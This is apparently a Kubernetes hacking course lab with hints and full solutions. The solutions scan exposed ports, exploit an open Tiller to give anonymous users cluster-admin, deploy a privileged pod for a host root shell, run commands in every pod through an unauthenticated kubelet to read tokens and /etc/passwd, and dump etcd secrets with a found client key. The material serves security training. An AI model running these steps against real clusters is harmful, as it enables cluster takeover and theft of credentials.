Lab 6: Hacking From the Outside
1. Interesting Ports in Kubernetes
We want to scan common Kubernetes (k8s) ports to see which are remotely exposed and what services are up and running.
Interesting Ports:
443, 6443, 8080, 8443 - Kubernetes API server
2379, 6666 - ETCD
10250, 10255 - Kubelet API
44134 - Tiller
4194 - cAdvisor container metrics
9099 - Calico health check
6782-6784 - Weave Net metrics and endpoints
10256 - Kube Proxy health check
30000-32767 - NodePort range (traffic proxied into exposed Services)
40997 - Docker containerd
Hint
The nmap command will help!
Solution
nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <IP>
For service scanning and fingerprinting use "-A", but it takes longer:
nmap -n -T4 -A -v -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <IP>
2. Tiller
We found Tiller running on port 44134. Let's try to exploit it.
In this case we will weaponize our knowledge of ClusterRoles and ClusterRoleBindings to make "system:anonymous" a Cluster Administrator.
We will use kubectl to test that currently "system:anonymous" has no privileges on the Kubernetes API:
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true auth can-i --list
# Expected error == selfsubjectrulesreviews.authorization.k8s.io is forbidden: User "system:anonymous" cannot create resource "selfsubjectrulesreviews" in API group "authorization.k8s.io" at the cluster scope
Hint
Use the course exploit scripts "helm-tiller-pwn". Also, the helm command will help!
Solution
clusterrole.yaml:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: anonymous-admin-access
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
- nonResourceURLs: ["*"]
  verbs: ["*"]
clusterrolebinding.yaml:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: anonymous-admin-access
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: anonymous-admin-access
subjects:
- kind: User
  name: system:anonymous
  apiGroup: rbac.authorization.k8s.io
Exploit:
cd k8s-hacking-scripts/11/helm-tiller-pwn
helm --host <IP>:44134 install --name pwn pwnchart
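Optionally, confirm that Tiller accepted the release before re-testing permissions (standard Helm 2 syntax, same --host flag as above):
helm --host <IP>:44134 list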
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true auth can-i --list
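If the listing now shows "*" for resources and verbs, anonymous requests effectively have cluster-admin rights. As a quick demonstration of what that means in practice (the namespaces and secret names you see will depend on the lab cluster):
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true get secrets -A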
3. Kubernetes API
OK, so we are the Cluster Administrator now. How do we create malicious pods to exploit the master and/or worker nodes that run them?
Let's try a "bad pod" attack.
Hint
https://bishopfox.com/blog/kubernetes-pod-privilege-escalation
Solution
Exploit:
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true describe pod everything-allowed-exec-pod
kubectl -s https://<IP>:6443 --insecure-skip-tls-verify=true exec -it everything-allowed-exec-pod -- chroot /host bash
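With a root shell on the underlying node, further pivoting is possible. For example, on a kubeadm-based control-plane node the cluster-admin kubeconfig typically lives at /etc/kubernetes/admin.conf; the path below is an assumption about the lab cluster, not something the bad pod guarantees:
# Inside the chroot'ed host shell (path assumed, kubeadm default):
cat /etc/kubernetes/admin.conf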
4. Kubelet API
We also identified the kubelet API on port 10250. Does the service allow unauthenticated access?
Hint
Use curl or get kubeletctl.
Solution
Test with curl:
curl https://<IP>:10250/pods -k
Install and test with kubeletctl:
wget https://github.com/cyberark/kubeletctl/releases/download/v1.9/kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 kubeletctl
chmod a+x ./kubeletctl
./kubeletctl pods --server <IP>
If the service allows unauthenticated access, what malicious actions can be performed?
List Pods
Run Commands in Pods
Solution
Example of running commands in all pods:
./kubeletctl pods --server <IP>
./kubeletctl run id --all-pods --server <IP>
./kubeletctl run "/bin/cat /etc/passwd" --all-pods --server <IP>
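Another worthwhile target is the service-account token that most pods mount; the path below is the standard Kubernetes mount point and is assumed to be present in the lab pods:
./kubeletctl run "/bin/cat /var/run/secrets/kubernetes.io/serviceaccount/token" --all-pods --server <IP>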
Some pods contain no basic Linux binaries (cat, ls, etc.). How do we get any information out of them?
Let's try exploring "etcd-k8s-vuln-0x-01-master", a pod with no binaries.
Solution
./kubeletctl exec /bin/sh -p etcd-k8s-vuln-0x-01-master -n kube-system -c etcd --server <IP> # Pod name may vary
echo * # no ls, no problem
echo .* # list hidden files/folders
echo "`</etc/passwd`" # no cat, no problem
5. ETCD
Based on the initial nmap scan, we observed that the ETCD port 2379 is not remotely exposed. Let's SSH into our master node and run nmap again.
Solution
nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 127.0.0.1
For service scanning and fingerprinting use "-A", but it takes longer:
nmap -n -T4 -A -v -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 127.0.0.1
Now we can reach TCP port 2379 locally, but ETCD requires authentication. Let's try to identify files of interest on the master node that will help us in the attack.
Files of interest usually contain the following string in their name:
".conf"
"config"
".key"
Hint
The find command will help!
Solution
Find files of interest:
find / -readable -iname "*.conf*" -ls 2>/dev/null
find / -readable -iname "*config*" -ls 2>/dev/null
find / -readable -iname "*.key*" -ls 2>/dev/null
We can see the readable file of interest: "/tmp/apiserver-etcd-client.key"
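Before using it, we can sanity-check that the file is a parsable private key (this assumes an RSA key, which is kubeadm's default for etcd client certificates):
openssl rsa -in /tmp/apiserver-etcd-client.key -noout -text | head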
OK, we found what seems to be a private key for ETCD client authentication. Does ETCD allow client authentication? Can we use the key to read ETCD data?
Hint
The ps and curl commands will help!
Solution
Use ps to see ETCD flags that allow client authentication:
ps aux | grep etcd
# has "--client-cert-auth=true"
Use curl with the public and private client keys:
curl --key /tmp/apiserver-etcd-client.key --cert /etc/kubernetes/pki/apiserver-etcd-client.crt -d '{"key": "AA==", "range_end": "AA=="}' https://127.0.0.1:2379/v3/kv/range -v -k
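# "AA==" is base64 for a single null byte; sending it as both "key" and "range_end"
# asks etcd for the entire keyspace. Keys and values in the JSON response are
# themselves base64-encoded.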
Great, we can read ETCD data ... but everything is base64-encoded and the ETCD endpoints and parameters are hard to remember. Can we make our life easier with a tool?
Hint
The etcdctl tool will help!
Solution
Get etcdctl:
wget https://github.com/etcd-io/etcd/releases/download/v3.5.11/etcd-v3.5.11-linux-amd64.tar.gz
tar -xzvf etcd-v3.5.11-linux-amd64.tar.gz
Use etcdctl:
ETCDCTL_KEY=/tmp/apiserver-etcd-client.key ETCDCTL_CERT=/etc/kubernetes/pki/apiserver-etcd-client.crt ETCDCTL_INSECURE_SKIP_TLS_VERIFY=true ETCDCTL_API=3 ./etcd-v3.5.11-linux-amd64/etcdctl --debug --endpoints https://127.0.0.1:2379 get / --prefix --keys-only
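Once the key listing works, individual objects can be pulled the same way. Kubernetes stores its objects under the /registry/ prefix by default, so (assuming that default prefix) secrets can be dumped with:
ETCDCTL_KEY=/tmp/apiserver-etcd-client.key ETCDCTL_CERT=/etc/kubernetes/pki/apiserver-etcd-client.crt ETCDCTL_INSECURE_SKIP_TLS_VERIFY=true ETCDCTL_API=3 ./etcd-v3.5.11-linux-amd64/etcdctl --endpoints https://127.0.0.1:2379 get /registry/secrets/ --prefix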
6. Automated Tools - kube-hunter
Manual testing is the gold standard, but let's see what can be identified with an automated scanning tool like "kube-hunter".
Hint
https://github.com/aquasecurity/kube-hunter
Solution
Get and run kube-hunter:
wget https://github.com/aquasecurity/kube-hunter/releases/download/v0.6.8/kube-hunter-linux-x86_64-refs.tags.v0.6.8 -O kube-hunter
chmod +x kube-hunter
./kube-hunter
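kube-hunter can also be pointed directly at the lab node instead of using the interactive prompt; its documented --remote flag does passive discovery, and --active additionally attempts exploitation:
./kube-hunter --remote <IP>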